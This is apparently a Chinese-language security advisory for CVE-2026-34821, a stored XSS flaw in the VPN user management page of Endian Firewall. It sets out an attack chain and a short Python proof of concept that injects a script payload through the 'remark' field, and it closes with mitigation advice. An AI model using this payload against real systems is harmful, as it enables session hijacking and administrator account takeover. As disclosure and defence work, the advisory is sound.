IPBUF安全漏洞报告
English
CVE-2026-34821 CVSS 6.4 中危

CVE-2026-34821 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34821
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

CVE-2026-34821Stored XSSEndian FirewallWeb SecurityMedium Risk

漏洞概述

Endian Firewall 3.3.25及更早版本中存在存储型跨站脚本(XSS)漏洞。由于应用程序在处理VPN认证用户管理页面的remark参数时未进行有效的输入过滤,经过身份认证的攻击者可以注入恶意JavaScript代码。该代码被存储在服务器端,当其他用户(特别是管理员)访问受影响页面时,恶意脚本将在其浏览器中执行,从而导致会话劫持或账户被接管。

技术细节

该漏洞源于Endian Firewall在处理用户输入时的安全缺陷。具体位于/manage/vpnauthentication/user/接口中,当攻击者提交包含恶意HTML或JavaScript代码的“remark”参数时,后端应用直接将其存储而未进行HTML实体编码或上下文感知的转义。由于攻击需要低权限认证(PR:L),攻击者首先需要获取一个普通用户账户。一旦Payload被成功存储,任何查看该VPN用户列表的用户都会触发XSS。攻击者可以利用此漏洞绕过同源策略,窃取管理员的Session ID,进而以管理员权限执行系统操作,甚至进一步渗透内网。

攻击链分析

STEP 1
1. 侦察与认证
攻击者识别目标为Endian Firewall系统,并获取一个低权限用户账户。
STEP 2
2. 恶意注入
攻击者登录系统,向/manage/vpnauthentication/user/接口发送POST请求,在remark参数中插入恶意JavaScript代码。
STEP 3
3. 恶意存储
服务器接收请求并将未经过滤的恶意脚本存储在数据库中。
STEP 4
4. 触发执行
当管理员或其他用户访问受影响的VPN用户管理页面时,服务器读取并输出被污染的数据,导致恶意脚本在受害者浏览器中执行。
STEP 5
5. 后果利用
攻击者利用执行的脚本窃取受害者的Session Cookie,进而接管账户权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "https://<target_ip>/manage/vpnauthentication/user/" # Attacker credentials (Low privilege required) login_data = { "username": "attacker", "password": "password" } # Payload containing stored XSS xss_payload = "<script>alert(document.cookie);</script>" # Data to be sent via POST request post_data = { "username": "victim_user", "remark": xss_payload # Injecting malicious script into the remark field } # Create a session to maintain cookies with requests.Session() as session: # Step 1: Authenticate session.post("https://<target_ip>/login", data=login_data) # Step 2: Send exploit request response = session.post(url, data=post_data) if response.status_code == 200: print("[+] XSS Payload injected successfully.") print("[+] The payload will execute when an admin views the user list.") else: print("[-] Injection failed.")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在未升级补丁前,建议限制对管理后台的访问来源IP,仅允许内网或特定IP访问。加强对管理员账户的安全审计,避免点击不明链接。同时,可在前端或网关处对输入参数进行强制性过滤,拦截包含<script>、javascript:等关键字的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表